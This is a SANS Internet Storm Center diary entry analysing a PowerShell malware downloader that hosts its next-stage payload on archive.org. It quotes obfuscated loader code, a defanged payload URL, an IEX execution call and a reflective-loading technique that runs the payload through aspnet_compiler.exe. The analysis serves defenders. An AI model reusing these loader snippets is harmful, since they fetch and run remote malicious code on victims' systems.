Threat Level: green Handler on Duty: Xavier Mertens

SANS ISC: SANS Internet Storm Center SANS Internet Storm Center

Sign Up for Free!   Forgot Password?
Log In or Sign Up for Free!

Latest Diaries

Malicious Content Delivered Through

Published: 2021-07-29
Last Updated: 2021-07-29 07:18:21 UTC
by Xavier Mertens (Version: 1)
0 comment(s)[1], also known as the "way back machine" is a very popular Internet site that allows you to travel back in time and browse old versions of a website (like the ISC website[2]). It works like regular search engines and continuously crawls the internet via bots. But there is another way to store content on You may create an account and upload some content by yourself.

I found a piece of malicious Powershell that uses to download the next stage payload. It's score on VT is only 5/58[3] (SHA256:2c661f8145f82a3010e0d5038faab09ea56bf93dd55c1d40f1276c947572597b). The script is quite simple:

  $D4FD5C5B9266824C4EEFC83E0C69FD3FAAx = "Fr"+"omBa"+"se6"+"4Str"+"ing"
  $D4FD5C5B9266824C4EEFC83E0C69FD3FAAG = [Text.Encoding]::Utf8.GetString([Convert]::$D4FD5C5B9266824C4EEFC83E0C69FD3FAAx($D4FD5C5B9266824C4EEFC83E0C69FD3FAAE))
  return $D4FD5C5B9266824C4EEFC83E0C69FD3FAAG
$TYFGYTFFFYTFYTFYTFYT = 'hxxps://ia601505[.]us[.]archive[.]org/1/items/server-lol-123_20210606/Server_lol_123.txt'
$Run=($HBAR -Join '')|I`E`X

The Base64 data is decoded and contains more Powershell code working like a downloader. It fetches the next payload from, dumps it on the disk, and executes it with the help of the following technique:

[Reflection.Assembly]::Load($H5).GetType('VBNET.PE').GetMethod('Run').Invoke($null,[object[]] ( 'C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe',$H1))

Let's put aside the malware (a classic one) and give more focus on the file grabbed from If you go one directory above, you'll see a directory listing:

The interesting file is server-lol-123_20210606_meta.xml. It reveals interesting information about the attacker:

<scanner>Internet Archive HTML5 Uploader 1.6.4</scanner>
<title>Server Lol 123</title>
<publicdate>2021-06-06 06:52:29</publicdate>
<addeddate>2021-06-06 06:52:29</addeddate>
[curator][/curator][date]20210606065744[/date][comment]checked for malware[/comment]

As you can see, this user uploaded a lot of files:

That's the wild Internet today: If you allow users to create an account and upload some data, chances are big that the feature will be (ab)used to host malicious content. Indeed, is a top domain and is usually not blocked or tagged as malicious.


Xavier Mertens (@xme)
Senior ISC Handler - Freelance Cyber Security Consultant

0 comment(s)

If you have more information or corrections regarding our diary, please share.

Recent Diaries

A sextortion e-mail from...IT support?!
Jul 28th 2021
1 day ago by Jan (0 comments)

Apple Patches for CVE-2021-30807
Jul 28th 2021
1 day ago by Yee Ching (0 comments)

Failed Malspam: Recovering The Password
Jul 26th 2021
2 days ago by DidierStevens (0 comments)

Wireshark 3.4.7 Released
Jul 25th 2021
4 days ago by DidierStevens (0 comments)

Active Directory Certificate Services (ADCS - PKI) domain admin vulnerability
Jul 24th 2021
4 days ago by Bojan (0 comments)

Agent.Tesla Dropped via a .daa Image and Talking to Telegram
Jul 24th 2021
5 days ago by Xme (0 comments)

Uncovering Shenanigans in an IP Address Block via Hurricane Electric's BGP Toolkit (II)
Jul 23rd 2021
6 days ago by Yee Ching (0 comments)

Lost in the Cloud: Akamai DNS Outage
Jul 22nd 2021
6 days ago by Johannes (0 comments)

View All Diaries →

Latest Discussions

Dshield Sensor
created Jun 8th 2021
1 month ago by Rick (0 replies)

API port data
created Apr 25th 2021
3 months ago by JJ (1 reply)

RSS feed containing non-XML compatible characters
created Apr 14th 2021
3 months ago by Anonymous (1 reply)

Handler's Diary (Full text) RSS Feeds stopt working due to a typo
created Mar 5th 2021
4 months ago by (0 replies)

port_scan issue in Snort3
created Feb 23rd 2021
5 months ago by astraea (0 replies)

View All Forums →

Latest News

Top Diaries

"Summer of SAM": Microsoft Releases Guidance for CVE-2021-36934
Jul 22nd 2021
1 week ago by Johannes (0 comments)

Securing and Optimizing Networks: Using pfSense Traffic Shaper Limiters to Combat Bufferbloat
Jul 12th 2021
2 weeks ago by Johannes (0 comments)

DIY CD/DVD Destruction - Follow Up
Jul 4th 2021
3 weeks ago by DidierStevens (0 comments)

Maldocs: Protection Passwords
Feb 28th 2021
4 months ago by DidierStevens (0 comments)

An infection from Rig exploit kit
Jun 17th 2019
2 years ago by Brad (0 comments)